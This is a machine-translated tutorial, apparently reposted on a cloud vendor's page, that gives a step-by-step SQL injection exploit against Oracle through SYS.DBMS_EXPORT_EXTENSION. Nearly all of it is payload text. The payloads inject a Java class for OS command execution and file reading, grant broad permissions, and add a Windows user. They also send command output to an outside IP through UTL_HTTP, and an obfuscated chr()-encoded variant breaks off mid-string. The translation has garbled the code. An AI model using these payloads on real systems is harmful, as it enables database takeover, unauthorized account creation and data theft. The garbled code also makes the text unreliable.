The following example shows how to change select SYS. DBMS_EXPORT_EXTENSION...
/Xxx. jsp? Id = 1 and 1 <> a | (select SYS. DBMS_EXPORT_EXTENSION .....)
. ("A |" is used to get the true value returned by the statement)
The statement is a bit long and may be submitted using post.
The steps are as follows:
1. Create a package
By injecting SYS. DBMS_EXPORT_EXTENSION function, you can create the LinxUtil Java package in oracle. The two functions are in it. runCMD is used to execute system commands and readFile is used to read files:
/Xxx. jsp? Id = 1 and 1 <> a | (
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
Create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader = new BufferedReader (
New InputStreamReader (runtime.getruntime(cmd.exe c (args). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + ""; myReader. close (); return str;} catch (Exception e) {return e. toString () ;}} public static String readFile (String filename) {try {BufferedReader myReader = new BufferedReader (new FileReader (filename); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + ""; myReader. close (); return str;} catch (Exception e) {return e. toString ();}}
}; END; --, SYS, 0, 0) from dual
)
------------------------
If the url has a length limit, you can remove the readFile () function block, namely:
/Xxx. jsp? Id = 1 and 1 <> a | (
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
Create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader = new BufferedReader (
New InputStreamReader (runtime.getruntime(cmd.exe c (args). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + ""; myReader. close (); return str;} catch (Exception e) {return e. toString ();}}
}; END; --, SYS, 0, 0) from dual
)
Remove the processing statement for readFile () mentioned in the subsequent steps.
------------------------------
2. Grant Java permissions
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate begin dbms_java.grant_permission (PUBLIC, SYS: java. io. filePermission, <all files>, execute); end; END; --, SYS, 0, 0) from dual
3. Create a function
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
Create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name LinxUtil. runCMD (java. lang. string) return String; END; --, SYS, 0, 1) from dual
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
Create or replace function LinxReadFile (filename in varchar2) return varchar2 as language java name LinxUtil. readFile (java. lang. string) return String; END; --, SYS, 0, 1) from dual
4. Grant the public permission to execute the function.
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxRunCMD to public; END; --, SYS, 0, 1) from dual
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxReadFile to public; END; --, SYS, 0, 1) from dual
5. test whether the preceding steps are successful.
And 1 <> 11 | (
Select OBJECT_ID from all_objects where object_name = LINXRUNCMD
)
And 1 <> (
Select OBJECT_ID from all_objects where object_name = LINXREADFILE
)
6. Run the following command:
/Xxx. jsp? Id = 1 and 1 <> (
Select sys. LinxRunCMD (cmd/c net user linx/add) from dual
)
/Xxx. jsp? Id = 1 and 1 <> (
Select sys. LinxReadFile (c:/boot. ini) from dual
)
Note that sys. LinxReadFile () returns the varchar type and cannot be replaced by "and 1 <>" and 1 <> ".
To view the running result, use union:
/Xxx. jsp? Id = 1 union select sys. LinxRunCMD (cmd/c net user linx/add) from dual
Or UTL_HTTP.request (:
/Xxx. jsp? Id = 1 and 1 <> (
SELECT UTL_HTTP.request (http: // 211.71.147.3/record. php? A = LinxRunCMD: | REPLACE (sys. LinxRunCMD (cmd/c net user aaa/del), % 20), % 0A) FROM dual
)
/Xxx. jsp? Id = 1 and 1 <> (
SELECT UTL_HTTP.request (http: // 211.71.147.3/record. php? A = LinxRunCMD: | REPLACE (sys. LinxReadFile (c:/boot. ini), % 20), % 0A) FROM dual
)
Note: When UTL_HTTP.request is used, REPLACE () should be used to REPLACE spaces and linefeeds. Otherwise, the http request cannot be submitted. You can also use utl_encode.base64_encode.
--------------------
6. internal changes
Run the following command to view the expression changes of all_objects:
Select * from all_objects where object_name like % LINX % or object_name like % Linx %
7. Delete the created Function
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
Drop function LinxRunCMD; END; --, SYS, 0, 1) from dual
========================================================== ================
The full text is complete. In this article, I would like to give it to my friends.
Linx
124829445
2008.1.12
Linyujian@bjfu.edu.cn
========================================================== ====================================
Another method to test vulnerabilities:
Create an oracle account:
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE
Create user linxsql identified by linxsql; END; --, SYS, 0, 1) from dual
That is:
Select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (chr (70) | chr (79) | chr (79), chr (66) | chr (65) | chr (82 ),
Chr (68) | chr (66) | chr (77) | chr (83) | chr (95) | chr (79) | chr (85) | chr (84) | chr (80) | chr (85) | chr (84) | chr (34) | chr (46) | chr (80) | chr (85) | chr (84) | chr (40) | chr (58) | chr (80) | chr (49) | chr (41) | chr (59) | chr (69) | chr (88) | chr (69) | chr (67) | chr (85) | chr (84) | chr (69) | chr (32) | chr (73) | chr (77) | chr (77) | chr (69) | chr (68) | chr (73) | chr (65) | chr (84) | chr (69) | chr (32) | chr (39) | chr (68) | chr (69) | chr (67) | chr (76) | chr (65) | chr (82) | chr (69) | chr (32) | chr (80) | chr (82) | chr (65) | chr (71) | chr (77) | chr (65) | chr (32) | chr (65) | chr (85) | chr (84) | chr (79) | chr (78) | chr (79) | chr (77) | chr (79) | chr (85) | chr (83) | chr (95) | chr (84) | chr (82) | chr (65) | chr (78) | chr (83) | chr (65) | chr (67) | chr (84) | chr (73) | chr (79) | chr (78) | chr (59) | chr (66) | chr (69) | chr (71) | chr (73) | chr (78) | chr (32) | chr (69) | chr (88) | chr (69) | chr (67) | chr (85) | chr (84) | chr (69) | chr (32) | chr (73) | chr (77) | chr (77) | chr (69) | chr (68) | chr (73) | chr
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
